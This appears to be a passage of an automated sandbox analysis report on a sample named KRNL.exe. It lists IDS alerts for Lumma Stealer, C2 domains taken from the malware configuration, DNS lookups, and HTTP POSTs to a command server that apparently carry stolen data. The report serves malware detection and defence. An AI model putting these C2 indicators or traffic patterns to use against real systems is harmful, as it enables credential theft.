                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 172.67.157.254:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: rebuildeso.buzz
                    Source: Malware configuration extractorURLs: hummskitnj.buzz
                    Source: Malware configuration extractorURLs: mindhandru.buzz
                    Source: Malware configuration extractorURLs: prisonyfork.buzz
                    Source: Malware configuration extractorURLs: screwamusresz.buzz
                    Source: Malware configuration extractorURLs: appliacnesot.buzz
                    Source: Malware configuration extractorURLs: inherineau.buzz
                    Source: Malware configuration extractorURLs: scentniej.buzz
                    Source: Malware configuration extractorURLs: cashfuzysao.buzz
                    Tries to resolve many domain names, but no domain seems valid
                    Source: unknownDNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: screwamusresz.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: scentniej.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: prisonyfork.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: hummskitnj.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: mindhandru.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: appliacnesot.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: cashfuzysao.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: rebuildeso.buzz replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: inherineau.buzz replaycode: Name error (3)
                    Source: global trafficTCP traffic: 192.168.2.4:54886 -> 162.159.36.2:53
                    Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.102.49.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.157.254:443
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LC4OYBSII4ZCJLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18143Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GGAL4P5RZVZHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8752Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2SZAJ2DN9HSSBMB80User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1XSU0JOGYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1199Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7HO70WUPW0KCDJFRF2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568307Host: lev-tolstoi.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab. equals www.youtube.com (Youtube)
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=eb57dd49dd895c3631208604; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 01 Jan 2025 20:27:59 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab. equals www.youtube.com (Youtube)
                    Source: KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; o( equals www.youtube.com (Youtube)
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr+ equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                    Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                    Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                    Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                    Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                    Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                    Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                    Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                    Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                    Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: KRNL.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: KRNL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: KRNL.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: KRNL.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: KRNL.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: KRNL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: KRNL.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: KRNL.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: KRNL.exeString found in binary or memory: http://ocsp.digicert.com0
                    Source: KRNL.exeString found in binary or memory: http://ocsp.digicert.com0A
                    Source: KRNL.exeString found in binary or memory: http://ocsp.entrust.net02
                    Source: KRNL.exeString found in binary or memory: http://ocsp.entrust.net03
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: KRNL.exeString found in binary or memory: http://www.digicert.com/CPS0
                    Source: KRNL.exeString found in binary or memory: http://www.entrust.net/rpa03
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampow
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
